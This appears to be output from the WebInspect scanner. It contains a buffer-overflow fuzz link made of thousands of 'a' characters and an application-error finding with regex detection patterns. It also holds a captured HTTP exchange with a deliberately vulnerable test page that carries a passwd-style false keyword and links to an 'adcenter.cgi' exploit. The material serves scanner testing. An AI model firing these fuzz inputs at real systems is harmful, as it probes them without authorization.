aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">BufferOverflow Link</A>
</P> </BODY>
</HTML>Application Error MessageA web application error message was found. An error message indicates that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has recieved user input that it did not expect and doesn't know how to deal with. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
error\shas\soccurred Or DB4Web\sClient\s-\sModul Not Generated\sby\sjavadocGET /testing/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 74827
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
<P> The first section shows how a combo box can be used to product optional
pages<BR></P>
<FORM ACTION="pcomboindex.asp" METHOD="post">
<SELECT NAME="cboPage">
<OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION>
<OPTION VALUE="pc2">Show Page Two</OPTION>
<OPTION VALUE="pc3">Show page three</OPTION>
</SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR>
<P><A HREF="plink.asp?a=b&c=12">Second section is link that passes
parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third
example allows the user to input values and then shows them on the following
page</P> <BR> <HR>
<P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR>
False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by
SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit
- Should not be flagged due to not having keyword present</A> <BR>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged
by Smartchecker(Note: No HTML present)</A> <BR> <A
HREF="/linking/index.htm">Several chained directories</A> <BR>
<A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A
HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A>
<A HREF="/my folder/bleh.html">space folder</A>
<A HREF='/myquote.asp?bleh=''>quote link</A>
